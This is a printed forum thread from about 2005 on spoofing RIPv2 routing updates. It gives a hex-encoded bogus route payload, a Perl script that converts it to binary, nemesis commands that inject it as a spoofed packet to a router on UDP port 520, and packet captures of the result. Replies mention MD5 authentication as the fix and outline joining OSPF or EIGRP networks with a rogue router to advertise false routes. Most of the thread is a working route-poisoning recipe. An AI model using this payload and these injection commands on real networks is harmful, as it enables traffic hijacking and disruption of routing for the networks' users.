Quote: |
02020000000200000e000000ffffff00c0a8007f00000002 |
Quote: |
#!/usr/bin/perl -w ### Coded by B4rtm4n (c) 06/05/2005 ### HEX to binary ### ### ### Convert datagram to raw ASCII ### Get input from file #$usage="perl hex2bin.pl hex.file > bin.file\n" $input = ""; while (<>) { $input=$input.$_; #print "$input"; } #$input = chomp ($input); $x=length($input); #get the size of the input $ascii=""; #ensure the string is initally null for ($y=0; $y < $x; $y++ ) { $z=substr($input, $y, 2); $dec= hex ($z); $ascii= chr ($dec); print "$ascii"; $y++; } |
Quote: |
MattA@W34p0nX /home/MattA ->perl hex2bin.pl inject > ascii.bin |
Quote: |
W34p0nX# nemesis udp -P /ascii.bin -S 192.168.0.127 -D 192.168.0.1 -x 520 -y 520 -t0 UDP Packet Injected |
ElToro wrote: |
One note, Cisco does support MD5 authentication even though it's not part of the RFC for RIPv2. OSPF and EIGRP both support MD5 as well. Using authentication is the way to stop this attack.
|
ElToro wrote: |
I am curious how this technique could be applied to more sophisticated routing protocols like EIGRP or OSPF assuming they were not using authentication. The first issue that comes to mind is the fact that both use their own transport protocol, not TCP or UDP. Second issue is how to manage the connection-oriented way these protocols work. Each uses acknowledgments and sequence numbers so address spoofing would be extremely difficult. |
ElToro wrote: |
I think the easiest way to implement this attack on EIGRP or OSPF is to sniff for the Hello packets and configure a rogue router to join the AS. The router essentially becomes the tool. You would configure the router to advertise the bogus routes and it would take care of the communications protocols. |
Quote: |
W34p0nX# nemesis udp -P /ascii.bin -S 192.168.0.127 -D 192.168.0.1 -x 520 -y 520 -t0 |
Code: |
No. Time Source Destination Protocol Info
45 84.612407 29.77.27.29 180.186.193.112 UDP Source port: 35649 Destination port: 33435 Frame 45 (554 bytes on wire, 554 bytes captured) Arrival Time: Oct 22, 2005 08:19:29.461535000 Time delta from previous packet: 0.606327000 seconds Time since reference or first frame: 84.612407000 seconds Frame Number: 45 Packet Length: 554 bytes Capture Length: 554 bytes Protocols in frame: eth:ip:udp:data Ethernet II, Src: 00:60:97:41:7f:73, Dst: 00:0f:b5:51:49:be Destination: 00:0f:b5:51:49:bc (Netgear_51:49:bc) Source: 00:60:97:41:7f:72 (3com_41:7f:72) Type: IP (0x0800) Internet Protocol, Src Addr: 29.77.27.29 (29.77.27.29), Dst Addr: 180.186.193.112 (180.186.193.112) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) Total Length: 540 Identification: 0x7f00 (32512) Flags: 0x00 Fragment offset: 0 Time to live: 255 Protocol: UDP (0x11) Header checksum: 0x8c3b (correct) Source: 29.77.27.29 (29.77.27.29) Destination: 180.186.193.112 (180.186.193.112) User Datagram Protocol, Src Port: 35649 (35649), Dst Port: 33435 (33435) Data (512 bytes) 0000 02 00 00 00 0c 00 04 01 2e 00 00 00 02 00 00 00 ................ 0010 0c 00 04 02 2e 2e 00 00 03 00 00 00 10 00 04 05 ................ 0020 2e 73 6e 61 70 00 00 00 40 20 00 00 0c 00 04 03 .snap...@ ...... 0030 64 65 76 00 c0 60 00 00 0c 00 04 03 74 6d 70 00 dev..`......tmp. 0040 80 40 00 00 0c 00 04 03 75 73 72 00 41 20 00 00 .@......usr.A .. 0050 0c 00 04 03 76 61 72 00 81 40 00 00 10 00 04 05 ....var..@...... 0060 73 74 61 6e 64 00 9f c1 c1 60 00 00 0c 00 04 03 stand....`...... 0070 65 74 63 00 42 20 00 00 10 00 04 05 63 64 72 6f etc.B ......cdro 0080 6d 00 8f c1 04 00 00 00 10 00 04 04 64 69 73 74 m...........dist 0090 00 f3 8f c1 43 20 00 00 0c 00 04 03 62 69 6e 00 ....C ......bin. 00a0 ca 60 00 00 10 00 04 04 62 6f 6f 74 00 76 9f c1 .`......boot.v.. 00b0 67 20 00 00 0c 00 04 03 6c 69 62 00 a4 40 00 00 g ......lib..@.. 00c0 10 00 04 07 6c 69 62 65 78 65 63 00 89 20 00 00 ....libexec.. .. 00d0 0c 00 04 03 6d 6e 74 00 a6 40 00 00 10 00 04 04 ....mnt..@...... 00e0 70 72 6f 63 00 76 9f c1 8a 20 00 00 10 00 04 06 proc.v... ...... 00f0 72 65 73 63 75 65 00 c1 a7 40 00 00 10 00 04 04 rescue...@...... 0100 72 6f 6f 74 00 76 9f c1 8e 20 00 00 10 00 04 04 root.v... ...... 0110 73 62 69 6e 00 76 9f c1 fd 00 00 00 0c 00 0a 03 sbin.v.......... 0120 73 79 73 00 a9 40 00 00 10 00 08 06 2e 63 73 68 sys..@.......csh 0130 72 63 00 c0 ab 40 00 00 14 00 08 08 2e 70 72 6f rc...@.......pro 0140 66 69 6c 65 00 2b 94 cc fe 00 00 00 14 00 08 09 file.+.......... 0150 43 4f 50 59 52 49 47 48 54 00 65 c0 ff 00 00 00 COPYRIGHT.e..... 0160 10 00 0a 06 63 6f 6d 70 61 74 00 c1 01 01 00 00 ....compat...... 0170 10 00 08 07 65 6e 74 72 6f 70 79 00 02 01 00 00 ....entropy..... 0180 10 00 0a 04 68 6f 6d 65 00 5d 04 c1 03 01 00 00 ....home.]...... 0190 0c 00 08 03 6c 6f 67 00 04 01 00 00 18 00 08 0e ....log......... 01a0 64 73 74 75 6d 62 6c 65 72 2e 63 6f 72 65 00 01 dstumbler.core.. 01b0 05 01 00 00 0c 00 08 02 2d 61 00 c1 06 01 00 00 ........-a...... 01c0 14 00 08 0b 64 77 65 70 64 75 6d 70 6c 6f 67 00 ....dwepdumplog. 01d0 07 01 00 00 30 00 08 06 73 75 6e 6c 6f 67 00 c0 ....0...sunlog.. 01e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 01f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ |
Quote: |
perl hex2bin.pl inject > ascii.bin |
Quote: |
02020000000200000e000000ffffff00c0a8007f00000002 |
Code: |
No. Time Source Destination Protocol Info
66 129.179098 192.168.0.127 192.168.0.1 RIP [Malformed Packet] Frame 66 (42 bytes on wire, 42 bytes captured) Arrival Time: Oct 22, 2005 11:08:54.324227000 Time delta from previous packet: 1.169777000 seconds Time since reference or first frame: 129.179098000 seconds Frame Number: 66 Packet Length: 42 bytes Capture Length: 42 bytes Protocols in frame: eth:ip:udp:rip Ethernet II, Src: 00:60:97:41:7f:73, Dst: 00:0f:b5:51:49:be Destination: 00:0f:b5:51:49:bc (192.168.0.1) Source: 00:60:97:41:7f:73 (192.168.0.4) Type: IP (0x0800) Internet Protocol, Src Addr: 192.168.0.127 (192.168.0.127), Dst Addr: 192.168.0.1 (192.168.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) Total Length: 28 Identification: 0x6b63 (27491) Flags: 0x00 Fragment offset: 0 Time to live: 255 Protocol: UDP (0x11) Header checksum: 0xce9c (correct) Source: 192.168.0.127 (192.168.0.127) Destination: 192.168.0.1 (192.168.0.1) User Datagram Protocol, Src Port: router (520), Dst Port: router (520) Source port: router (520) Destination port: router (520) Length: 8 Checksum: 0x79fd (correct) [Malformed Packet: RIP] |
output generated using printer-friendly topic mod, All times are GMT + 2 Hours